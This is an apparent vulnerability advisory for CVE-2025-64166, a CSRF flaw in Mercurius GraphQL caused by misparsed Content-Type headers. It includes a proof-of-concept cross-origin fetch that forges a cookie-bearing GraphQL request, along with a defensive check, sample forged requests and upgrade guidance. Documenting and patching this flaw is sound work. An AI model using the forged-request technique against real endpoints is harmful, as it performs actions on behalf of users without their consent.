CVE-2025-64166
Mercurius: Incorrect Content-Type parsing can lead to CSRF attack
Description
### Summary

A Cross-Site Request Forgery (CSRF) vulnerability was identified in Mercurius 16.x before 16.4.0. The issue arises from incorrect parsing of the `Content-Type` header of incoming requests: bodies sent with `Content-Type` values such as `application/x-www-form-urlencoded`, `multipart/form-data`, or `text/plain` could be interpreted as `application/json` and executed as GraphQL operations. Those three content types are exactly the ones a browser may send cross-origin without a CORS preflight, so the misparsing lets a page on another origin submit a GraphQL operation with the victim's cookies attached, skipping the preflight that a `fetch()` with `Content-Type: application/json` would trigger. This potentially allows unauthorized actions to be performed on behalf of an authenticated user.

---

### Impact

An attacker could exploit this vulnerability by crafting a request with a CORS-safelisted `Content-Type` whose body the Mercurius endpoint nevertheless parses as `application/json`. When a victim's browser sends such a request from the attacker's origin, it goes out as a CORS "simple request": no preflight is made and the victim's cookies are included. The attacker cannot read the response, but the server still executes the operation, so any state-changing mutation the authenticated user is allowed to run can be performed without their consent.

---

### Proof of Concept

```javascript
// Server-side Fastify setup (vulnerable: Mercurius 16.x before 16.4.0)
const Fastify = require('fastify');
const mercurius = require('mercurius');

const app = Fastify();

const schema = `
  type Query {
    hello(name: String): String
  }
`;

const resolvers = {
  Query: {
    hello: (_, { name }) => `Hello ${name || 'World'}!`
  }
};

app.register(mercurius, { schema, resolvers });

// Fastify 4+ requires an options object here; `app.listen(3000, cb)` throws.
app.listen({ port: 3000 }, (err, address) => {
  if (err) throw err;
  console.log(`Server listening on ${address}`);
});
```

```javascript
// Malicious client-side code, served from an attacker-controlled origin
fetch('http://localhost:3000/graphql', {
  method: 'POST',
  // A JSON GraphQL request body...
  body: JSON.stringify({ query: '{ hello(name: "attacker") }' }),
  // ...labelled with a CORS-safelisted Content-Type, so the browser sends it
  // without a preflight. The vulnerable endpoint parses the body as JSON anyway.
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  // Attach the victim's cookies for the target origin.
  credentials: 'include'
});
```

In the above example the request carries a JSON GraphQL body under a `Content-Type` that the vulnerable endpoint treats as `application/json`. Because `application/x-www-form-urlencoded` is CORS-safelisted, the browser sends the request without a preflight, and the resolver runs with the victim's session. The same pattern applies to mutations, which is where the real damage lies.

---

### Mitigation

To address this vulnerability, CSRF protection has been implemented in Mercurius 16.4.0 (see the referenced pull request).
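The advisory describes the mechanism but not the check that closes it. The following is an added example, not code from Mercurius or Fastify: it classifies an incoming GraphQL POST by whether a browser could have sent it cross-origin without a CORS preflight (safelisted or missing `Content-Type`, no custom header) and refuses to execute such requests before the body is parsed. It goes beyond the PoC by handling media type parameters, case differences, the Fetch spec's 128-byte rule, and the opt-in header a same-origin front end can add when it genuinely needs `multipart/form-data`. The header name `x-require-preflight`, the function names and the sample requests are assumptions of this example.

```javascript
// Added example, not code from Mercurius or Fastify: refuse GraphQL POSTs that
// a browser could have sent cross-origin without a CORS preflight. Such
// requests carry the victim's cookies, so the endpoint must not execute them
// on the strength of a body that merely happens to parse as JSON.

// The three Content-Type values the Fetch spec treats as CORS-safelisted.
const SAFELISTED_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// Custom header whose presence proves a preflight happened (any header outside
// the Fetch safelist forces one). The name is an assumption of this example,
// not a header Mercurius defines.
const REQUIRE_PREFLIGHT_HEADER = 'x-require-preflight';

// Media type syntax: type "/" subtype, both RFC 7230 tokens.
const MEDIA_TYPE_RE = /^[!#$%&'*+.^_`|~0-9a-z-]+\/[!#$%&'*+.^_`|~0-9a-z-]+$/;

// Reduce a Content-Type value to its lowercased essence ("text/plain" for
// "Text/Plain; charset=utf-8"). Returns null when the value does not parse.
function mediaTypeEssence(value) {
  const essence = value.split(';')[0].trim().toLowerCase();
  return MEDIA_TYPE_RE.test(essence) ? essence : null;
}

// Mirror of the Fetch spec's "CORS-safelisted request-header" rule for
// Content-Type: at most 128 bytes, must parse, essence must be in the safelist.
function isSafelistedContentType(value) {
  if (Buffer.byteLength(value) > 128) return false;
  const essence = mediaTypeEssence(value);
  return essence !== null && SAFELISTED_CONTENT_TYPES.has(essence);
}

// True when a browser could have sent `headers` (lowercased names -> values,
// as Node exposes them) cross-origin with no preflight.
function isPreflightFree(headers) {
  const ct = headers['content-type'];
  if (ct !== undefined && !isSafelistedContentType(ct)) return false;
  // Any header outside the safelist would have triggered a preflight; this
  // example only looks for the one it asks clients to send.
  return !(REQUIRE_PREFLIGHT_HEADER in headers);
}

// Decision for a GraphQL POST: reject preflight-free requests before the body
// is parsed, so a JSON body hidden behind text/plain is never executed.
function checkGraphqlPost(headers) {
  if (isPreflightFree(headers)) {
    return {
      allowed: false,
      status: 403,
      reason: `Content-Type is CORS-safelisted and ${REQUIRE_PREFLIGHT_HEADER} is missing`,
    };
  }
  return { allowed: true, status: 200, reason: 'ok' };
}

// Constructed requests for illustration (not captured traffic).
const SAMPLE_REQUESTS = {
  // The advisory's PoC: JSON body labelled as a form post, cookies attached.
  forgedForm: { 'content-type': 'application/x-www-form-urlencoded', cookie: 'session=victim' },
  forgedTextPlain: { 'content-type': 'text/plain; charset=utf-8', cookie: 'session=victim' },
  forgedMultipart: { 'content-type': 'multipart/form-data; boundary=----x', cookie: 'session=victim' },
  forgedNoContentType: { cookie: 'session=victim' },
  // Ordinary GraphQL client: application/json always triggers a preflight.
  legitimateJson: { 'content-type': 'application/json; charset=utf-8', cookie: 'session=victim' },
  // Form upload from the site's own front end, opted in with the custom header.
  legitimateFormWithHeader: { 'content-type': 'multipart/form-data; boundary=----x', 'x-require-preflight': 'true' },
};

// Run every sample through the check and return the HTTP status each would get.
function runSamples() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLE_REQUESTS)) {
    out[name] = checkGraphqlPost(headers).status;
  }
  return out;
}

console.log(runSamples());
```

In a Fastify application this check belongs in a hook that runs before the body parser (`onRequest` or `preParsing`), replying 403 whenever `checkGraphqlPost(request.headers).allowed` is false; the point is that the decision is made from the headers alone, never from whether the body happens to be valid JSON. A legitimate same-origin client that must send a safelisted type adds the custom header, which makes the browser preflight the request, so the server's CORS policy then decides whether it proceeds.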
## References

* https://github.com/mercurius-js/mercurius/pull/1187
How to fix CVE-2025-64166
To remediate CVE-2025-64166, upgrade the affected package to a fixed version below.
- mercurius (npm): upgrade to 16.4.0 or later
Is CVE-2025-64166 being exploited?
Low. The EPSS score is 0.0%, i.e. the model estimates a negligible probability of exploitation in the wild over the next 30 days. EPSS is a prediction rather than an observation, and the proof of concept above needs nothing more than a page the victim visits while logged in to an affected Mercurius endpoint, so treat the upgrade as routine rather than optional.